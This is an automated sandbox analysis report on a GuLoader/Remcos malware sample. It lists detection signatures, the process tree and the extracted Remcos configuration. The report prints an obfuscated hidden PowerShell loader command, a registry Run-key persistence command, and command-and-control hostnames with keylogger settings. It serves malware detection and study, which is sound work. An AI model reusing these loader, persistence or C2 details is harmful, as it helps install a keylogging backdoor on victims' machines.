Edit tour
Windows
Analysis Report
z42MNA2024000000041-KWINTMADI-11310Y_K.exe
Overview
General Information
Detection
GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- z42MNA2024000000041-KWINTMADI-11310Y_K.exe (PID: 2672 cmdline:
"C:\Users\ user\Deskt op\z42MNA2 0240000000 41-KWINTMA DI-11310Y_ K.exe" MD5: DE3166B6CC1E83299FA1A4704C3CC674) - powershell.exe (PID: 1436 cmdline:
"powershel l.exe" -wi ndowstyle hidden "$A ccordionis ts=Get-Con tent 'C:\U sers\user\ AppData\Lo cal\austra lnegeren\i ndtgtskild en\Eksplod eringers\G raastenere s.Sfa';$ze braernes=$ Accordioni sts.SubStr ing(8504,3 );.$zebrae rnes($Acco rdionists) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4508 cmdline:
"C:\Window s\system32 \cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - wab.exe (PID: 4424 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89) - cmd.exe (PID: 3176 cmdline:
"C:\Window s\System32 \cmd.exe" /c REG ADD HKCU\Soft ware\Micro soft\Windo ws\Current Version\Ru n /f /v "S tartup key " /t REG_E XPAND_SZ / d "%Oplags mssigt19% -windowsty le minimiz ed $Vicefo rmnds=(Get -ItemPrope rty -Path 'HKCU:\Ene cellens\') .Bidslerne s;%Oplagsm ssigt19% ( $Viceformn ds)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 4508 cmdline:
REG ADD HK CU\Softwar e\Microsof t\Windows\ CurrentVer sion\Run / f /v "Star tup key" / t REG_EXPA ND_SZ /d " %Oplagsmss igt19% -wi ndowstyle minimized $Viceformn ds=(Get-It emProperty -Path 'HK CU:\Enecel lens\').Bi dslernes;% Oplagsmssi gt19% ($Vi ceformnds) " MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - wab.exe (PID: 1272 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" /ste xt "C:\Use rs\user\Ap pData\Loca l\Temp\dbr maaaxofoay frhavodhft pbvpppan" MD5: 251E51E2FEDCE8BB82763D39D631EF89) - wab.exe (PID: 4764 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" /ste xt "C:\Use rs\user\Ap pData\Loca l\Temp\nve w" MD5: 251E51E2FEDCE8BB82763D39D631EF89) - wab.exe (PID: 2640 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" /ste xt "C:\Use rs\user\Ap pData\Loca l\Temp\xxk ptdv" MD5: 251E51E2FEDCE8BB82763D39D631EF89) - wab.exe (PID: 2076 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" /ste xt "C:\Use rs\user\Ap pData\Loca l\Temp\xxk ptdv" MD5: 251E51E2FEDCE8BB82763D39D631EF89) - wab.exe (PID: 3496 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" /ste xt "C:\Use rs\user\Ap pData\Loca l\Temp\xxk ptdv" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | ||
Click to see the 1 entries |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp: | 04/19/24-19:21:31.428672 |
SID: | 2032776 |
Source Port: | 49718 |
Destination Port: | 29871 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/19/24-19:21:31.654705 |
SID: | 2032777 |
Source Port: | 29871 |
Destination Port: | 49718 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | URL Reputation: | ||
Source: | URL Reputation: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_004027FB | |
Source: | Code function: | 0_2_00406393 | |
Source: | Code function: | 0_2_00405841 | |
Source: | Code function: | 7_2_242010F1 | |
Source: | Code function: | 7_2_24206580 | |
Source: | Code function: | 11_2_0040AE51 | |
Source: | Code function: | 12_2_00407EF8 | |
Source: | Code function: | 15_2_00407898 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | URLs: |
Source: | TCP traffic: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | Windows user hook set: | Jump to behavior |
Source: | Code function: | 0_2_004052EE |
Source: | Code function: | 11_2_0040987A | |
Source: | Code function: | 11_2_004098E2 | |
Source: | Code function: | 12_2_00406DFC | |
Source: | Code function: | 12_2_00406E9F | |
Source: | Code function: | 15_2_004068B5 | |
Source: | Code function: | 15_2_004072B5 |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | Code function: | 7_2_07ED9F96 | |
Source: | Code function: | 11_2_0040DD85 | |
Source: | Code function: | 11_2_00401806 | |
Source: | Code function: | 11_2_004018C0 | |
Source: | Code function: | 12_2_004016FD | |
Source: | Code function: | 12_2_004017B7 | |
Source: | Code function: | 15_2_00402CAC | |
Source: | Code function: | 15_2_00402D66 |
Source: | Code function: | 0_2_004032A0 |
Source: | Code function: | 0_2_00407040 | |
Source: | Code function: | 0_2_00406869 | |
Source: | Code function: | 0_2_00404B2B | |
Source: | Code function: | 7_2_24217194 | |
Source: | Code function: | 7_2_2420B5C1 | |
Source: | Code function: | 11_2_0044B040 | |
Source: | Code function: | 11_2_0043610D | |
Source: | Code function: | 11_2_00447310 | |
Source: | Code function: | 11_2_0044A490 | |
Source: | Code function: | 11_2_0040755A | |
Source: | Code function: | 11_2_0043C560 | |
Source: | Code function: | 11_2_0044B610 | |
Source: | Code function: | 11_2_0044D6C0 | |
Source: | Code function: | 11_2_004476F0 | |
Source: | Code function: | 11_2_0044B870 | |
Source: | Code function: | 11_2_0044081D | |
Source: | Code function: | 11_2_00414957 | |
Source: | Code function: | 11_2_004079EE | |
Source: | Code function: | 11_2_00407AEB | |
Source: | Code function: | 11_2_0044AA80 | |
Source: | Code function: | 11_2_00412AA9 | |
Source: | Code function: | 11_2_00404B74 | |
Source: | Code function: | 11_2_00404B03 | |
Source: | Code function: | 11_2_0044BBD8 | |
Source: | Code function: | 11_2_00404BE5 | |
Source: | Code function: | 11_2_00404C76 | |
Source: | Code function: | 11_2_00415CFE | |
Source: | Code function: | 11_2_00416D72 | |
Source: | Code function: | 11_2_00446D30 | |
Source: | Code function: | 11_2_00446D8B | |
Source: | Code function: | 11_2_00406E8F | |
Source: | Code function: | 12_2_00405038 | |
Source: | Code function: | 12_2_0041208C | |
Source: | Code function: | 12_2_004050A9 | |
Source: | Code function: | 12_2_0040511A | |
Source: | Code function: | 12_2_0043C13A | |
Source: | Code function: | 12_2_004051AB | |
Source: | Code function: | 12_2_00449300 | |
Source: | Code function: | 12_2_0040D322 | |
Source: | Code function: | 12_2_0044A4F0 | |
Source: | Code function: | 12_2_0043A5AB | |
Source: | Code function: | 12_2_00413631 | |
Source: | Code function: | 12_2_00446690 | |
Source: | Code function: | 12_2_0044A730 | |
Source: | Code function: | 12_2_004398D8 | |
Source: | Code function: | 12_2_004498E0 | |
Source: | Code function: | 12_2_0044A886 | |
Source: | Code function: | 12_2_0043DA09 | |
Source: | Code function: | 12_2_00438D5E | |
Source: | Code function: | 12_2_00449ED0 | |
Source: | Code function: | 12_2_0041FE83 | |
Source: | Code function: | 12_2_00430F54 | |
Source: | Code function: | 15_2_004050C2 | |
Source: | Code function: | 15_2_004014AB | |
Source: | Code function: | 15_2_00405133 | |
Source: | Code function: | 15_2_004051A4 | |
Source: | Code function: | 15_2_00401246 | |
Source: | Code function: | 15_2_0040CA46 | |
Source: | Code function: | 15_2_00405235 | |
Source: | Code function: | 15_2_004032C8 | |
Source: | Code function: | 15_2_00401689 | |
Source: | Code function: | 15_2_00402F60 |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Classification label: |
Source: | Code function: | 11_2_004182CE |
Source: | Code function: | 0_2_004032A0 | |
Source: | Code function: | 15_2_00410DE1 |
Source: | Code function: | 0_2_004045AF |
Source: | Code function: | 11_2_00413D4C |
Source: | Code function: | 0_2_00402095 |
Source: | Code function: | 11_2_0040B58D |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | System information queried: | Jump to behavior |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Evasive API call chain: | graph_12-33249 |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 11_2_004044A4 |
Source: | Code function: | 2_2_0790E5AD | |
Source: | Code function: | 7_2_24202819 | |
Source: | Code function: | 11_2_0044694D | |
Source: | Code function: | 11_2_0044DB84 | |
Source: | Code function: | 11_2_0044DBAC | |
Source: | Code function: | 11_2_00451D61 | |
Source: | Code function: | 12_2_0044B0A4 | |
Source: | Code function: | 12_2_0044B0CC | |
Source: | Code function: | 12_2_00451D41 | |
Source: | Code function: | 12_2_00444E81 | |
Source: | Code function: | 15_2_00414074 | |
Source: | Code function: | 15_2_0041409C | |
Source: | Code function: | 15_2_00414049 | |
Source: | Code function: | 15_2_004165C4 | |
Source: | Code function: | 15_2_004165C4 | |
Source: | Code function: | 15_2_004165C4 |
Source: | File created: | Jump to dropped file |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Source: | Code function: | 12_2_004047CB |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Code function: | 11_2_0040DD85 |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | API coverage: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
